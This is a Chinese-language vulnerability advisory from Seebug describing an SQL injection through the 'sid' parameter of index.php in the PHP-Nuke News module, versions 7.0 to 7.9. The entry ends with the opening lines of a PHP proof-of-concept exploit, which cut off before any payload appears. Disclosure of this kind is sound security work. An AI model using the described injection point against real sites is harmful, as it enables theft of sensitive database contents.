Lucene search
RootSSV:593HistoryNov 29, 2006 - 12:00 a.m.
PHP-Nuke News Module Index.PHP SQL注入漏洞
2006-11-2900:00:00
Root
www.seebug.org
10
PHP-Nuke News是一款基于PHP-Nuke的一个新闻模块。
PHP-Nuke News不充分过滤用户提交的URI输入,远程攻击者可以利用漏洞进行SQL注入攻击,获得敏感信息。
问题是’Index.PHP’脚本对用户提交的’sid’参数缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息。
PHP-Nuke PHP-Nuke 7.9
PHP-Nuke PHP-Nuke 7.8
PHP-Nuke PHP-Nuke 7.7
PHP-Nuke PHP-Nuke 7.6
PHP-Nuke PHP-Nuke 7.5
PHP-Nuke PHP-Nuke 7.4
PHP-Nuke PHP-Nuke 7.3
PHP-Nuke PHP-Nuke 7.2
PHP-Nuke PHP-Nuke 7.1
PHP-Nuke PHP-Nuke 7.0
<a href=“http://www.phpnuke.org” target=“_blank”>http://www.phpnuke.org</a>
<?
/*
Neo Security Team - Pseudo-Code Proof of Concept Exploit
http://www.neosecurityteam.net
Paisterist
*/
set_time_limit(0);
$host="localhost";
$path="/phpnuk